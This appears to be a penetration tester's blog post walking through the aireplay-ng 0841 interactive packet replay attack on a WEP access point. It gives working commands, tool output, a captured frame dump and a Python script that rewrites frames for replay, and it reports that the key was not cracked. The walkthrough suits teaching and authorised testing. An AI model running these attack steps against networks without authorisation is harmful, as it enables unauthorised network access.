Aireplay 0841 Attack – aka Interactive Packet Replay

This week I wanted to cover the aireplay 0841 attack, or interactive packet replay. I know that this is yet another wireless post, but I've been on a few wireless engagements recently!

Aireplay 0841 Attack - Introduction

For those of you not familiar, interactive packet replay is aireplay-ng attack 2 (-2): you pick a captured WEP data packet and inject it over and over. The 0841 variant sets the frame control word of the replayed packet to 0x0841, which marks it as a WEP-protected data frame with the To DS bit set (that is, a frame from a wireless client to the AP), and points it at the broadcast address. The AP accepts the frame because it comes from a (fake-)authenticated client MAC, relays it to the wireless side re-encrypted under a fresh IV, and every relayed copy is another IV for aircrack-ng. This is the fallback when ARP replay is not available or not working, for example when there is no client on the network generating ARP requests.

If you would like some more information, then you can also read the following write-up.

Attempting ARP Replay

First, I sent a fake authentication request to the target access point (attack -1 with a re-association delay of 0, i.e. a single authentication), so that the AP would accept injected frames from my card's MAC address (00:C0:CA:8D:89:75).

root@kali:~# aireplay-ng -1 0 -e TargetAP -a FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
18:07:45  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11

18:07:45  Sending Authentication Request (Open System) [ACK]
18:07:45  Authentication successful
18:07:45  Sending Association Request [ACK]
18:07:45  Association successful 🙂 (AID: 1)

Next, I attempted an ARP Replay attack. Unfortunately, I received 0 ARP requests even after 205,000 packets: ARP replay needs to capture a real ARP request, normally from a client on the network, and, as the airodump-ng output further down shows, the only station associated with this AP was my own fake-authenticated card.

root@kali:~# aireplay-ng --arpreplay -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
18:03:37  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-1031-180337.cap
You should also start airodump-ng to capture replies.
Read 205379 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
^C

Enter the Aireplay 0841 Attack

As an ARP Replay attack was not working, it was time to try the 0841 attack.

First, aireplay-ng needed to capture a WEP data packet to use as the replay source. Any data frame will do, because -p 0841 overwrites its frame control word with 0x0841 (data frame, WEP bit set, To DS set, so it looks like it was sent by a wireless client), -h sets the source address to my fake-authenticated MAC, and -c FF:FF:FF:FF:FF:FF overwrites the destination with the broadcast address, which is what makes the AP relay the frame with a new IV. The packet it offered was a broadcast frame sent by the AP itself (FromDS 1, ToDS 0; note the 0842 frame control in the first two bytes of the dump). Hitting the "y" key saved the packet and started replaying it on the network.

root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 856 packets...

        Size: 118, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  FC:5B:xx:xx:xx:xx
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  4C:34:88:2C:23:6A

        0x0000:  0842 0000 ffff ffff ffff fc5b 3969 0062  .B.........[9i.b
        0x0010:  4c34 882c 236a 3058 713d 8a80 82c7 724b  L4.,#j0Xq=....rK
        0x0020:  df97 716b 5223 a570 e093 b405 faac bde5  ..qkR#.p........
        0x0030:  74bf 43d5 8047 377f c79c cbf4 b8e3 48e3  t.C..G7......H.
        0x0040:  07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd  ....l..T...F....
        0x0050:  b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13  ..).U.j..5..,...
        0x0060:  32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64  2......?+.....d
        0x0070:  51e6 e547 06ab                           Q..G..

Use this packet ? y

Saving chosen packet in replay_src-1031-180750.cap
You should also start airodump-ng to capture replies.

Sent 27144 packets...(499 pps)

As you can see in airodump-ng (which you should have running on the same channel and BSSID, writing to a file with -w, since that capture file is what aircrack-ng will read), the #Data counter was now climbing, so the AP was relaying my injected frames with new IVs, albeit a bit slowly!

 CH 11 ][ Elapsed: 12 mins ][ 2017-10-31 18:10                             
                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AU
                                                                           
 FC:5B:xx:xx:xx:xx  -32   2     3412      116    0  11  54e. WEP  WEP40  OP
                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe 
                                                                           
 FC:5B:xx:xx:xx:xx  00:C0:CA:8D:89:75    0    9 - 1   4858    74695
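To make the 0841 rewrite concrete, here is an added example (not code from the original post and not aircrack-ng's own code) that decodes the 118-byte frame aireplay-ng offered above and re-addresses it the way -p 0841 -c FF:FF:FF:FF:FF:FF -h 00:C0:CA:8D:89:75 does. The frame bytes are transcribed from the hex dump above; the BSSID constant is the second address in that dump, and the client MAC is the -h value from the commands. The address roles follow the 802.11 three-address rules, so this models what the replayed frame looks like on the air rather than reproducing aireplay-ng's internals.

```python
"""Decode the captured WEP data frame above and apply the 0841 rewrite to it."""
from dataclasses import dataclass

# The 118-byte frame aireplay-ng printed above (0x0000..0x0070 lines),
# transcribed from the page. bytes.fromhex() ignores the whitespace.
CAPTURED = bytes.fromhex(
    "0842 0000 ffff ffff ffff fc5b 3969 0062"
    "4c34 882c 236a 3058 713d 8a80 82c7 724b"
    "df97 716b 5223 a570 e093 b405 faac bde5"
    "74bf 43d5 8047 377f c79c cbf4 b8e3 48e3"
    "07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd"
    "b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13"
    "32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64"
    "51e6 e547 06ab"
)

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP_BSSID = "fc:5b:39:69:00:62"          # addr2 of the captured frame (the AP)
FAKE_AUTH_CLIENT = "00:c0:ca:8d:89:75"  # the -h value used in the commands above

# Frame-control bytes in the order aireplay-ng prints them (-p 0841 == 0x08 0x41):
#   byte 0: protocol version, type, subtype (0x08 = data frame, subtype 0)
#   byte 1: flags; bit 0 = To DS, bit 1 = From DS, 0x40 = Protected (WEP)
FC_TO_DS = 0x01
FC_FROM_DS = 0x02
FC_PROTECTED = 0x40


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


@dataclass
class Dot11Data:
    fc: int
    to_ds: bool
    from_ds: bool
    protected: bool
    bssid: str
    src: str
    dest: str
    iv: bytes       # 3-byte WEP IV (empty if the frame is not protected)
    key_index: int  # WEP key id from the top two bits of the 4th WEP byte
    size: int


def parse_80211(frame: bytes) -> Dot11Data:
    """Parse a three-address 802.11 data frame and its WEP parameters."""
    if len(frame) < 24:
        raise ValueError("short 802.11 header")
    b0, flags = frame[0], frame[1]
    if (b0 >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(flags & FC_TO_DS), bool(flags & FC_FROM_DS)
    if to_ds and from_ds:
        raise ValueError("4-address (WDS) frames are not handled here")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds:        # station -> AP:  addr1 = BSSID, addr2 = SA, addr3 = DA
        bssid, src, dest = a1, a2, a3
    elif from_ds:    # AP -> station:  addr1 = DA, addr2 = BSSID, addr3 = SA
        dest, bssid, src = a1, a2, a3
    else:            # ad hoc:         addr1 = DA, addr2 = SA, addr3 = BSSID
        dest, src, bssid = a1, a2, a3
    protected = bool(flags & FC_PROTECTED)
    iv, key_index = b"", 0
    if protected:    # WEP parameters follow the 24-byte header: IV[3] + keyid byte
        iv, key_index = frame[24:27], frame[27] >> 6
    return Dot11Data((b0 << 8) | flags, to_ds, from_ds, protected,
                     mac_str(bssid), mac_str(src), mac_str(dest),
                     iv, key_index, len(frame))


def describe(info: Dot11Data) -> str:
    """The summary line aireplay-ng prints before asking 'Use this packet ?'."""
    enc = " (WEP)" if info.protected else ""
    return f"Size: {info.size}, FromDS: {int(info.from_ds)}, ToDS: {int(info.to_ds)}{enc}"


def rewrite_0841(frame: bytes, bssid: str, src: str, dest: str = BROADCAST) -> bytes:
    """Re-address a captured WEP data frame as '-p 0841 -c <dest> -h <src>' does.

    Frame control becomes 0x0841 (data, Protected, To DS), so the AP sees a frame
    from an associated station addressed to <dest>. Only the cleartext 802.11
    header is changed; IV, ciphertext and ICV are copied verbatim. That is why
    the trick works: WEP's ICV covers the plaintext body only, never the MAC
    header, so the AP decrypts the body fine and re-encrypts it under a fresh IV
    when it relays the broadcast to the wireless side.
    """
    out = bytearray(frame)
    out[0], out[1] = 0x08, FC_PROTECTED | FC_TO_DS
    out[4:10] = mac_bytes(bssid)   # addr1 = BSSID (receiver)
    out[10:16] = mac_bytes(src)    # addr2 = source station (the fake-authed MAC)
    out[16:22] = mac_bytes(dest)   # addr3 = final destination (broadcast)
    return bytes(out)


if __name__ == "__main__":
    orig = parse_80211(CAPTURED)
    print(describe(orig), orig.bssid, orig.src, orig.dest, orig.iv.hex(), orig.key_index)
    replay = rewrite_0841(CAPTURED, AP_BSSID, FAKE_AUTH_CLIENT)
    print(describe(parse_80211(replay)))
```

Running it reproduces the "Size: 118, FromDS: 1, ToDS: 0 (WEP)" line from the aireplay-ng output for the captured frame and "FromDS: 0, ToDS: 1" for the rewritten one; the bytes from offset 24 onward (IV 71:3d:8a, key index 2, ciphertext and ICV) are identical in both, which is the whole point of the attack.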

Cracking

Unfortunately, I was unable to crack this specific key even after 50k IVs. That said, the process is the same as for any other WEP capture: leave the replay and airodump-ng running until the IV count is high enough, then point aircrack-ng at the airodump-ng capture file (filtering on the target BSSID) and let it keep retrying as more IVs arrive.

Aireplay 0841 Attack - Conclusion

While I wasn't able to crack this particular key, hopefully you were able to learn a new WEP attack.

Next week will finally be a non-wireless post again, so be on the lookout!

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (currently GXPN) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included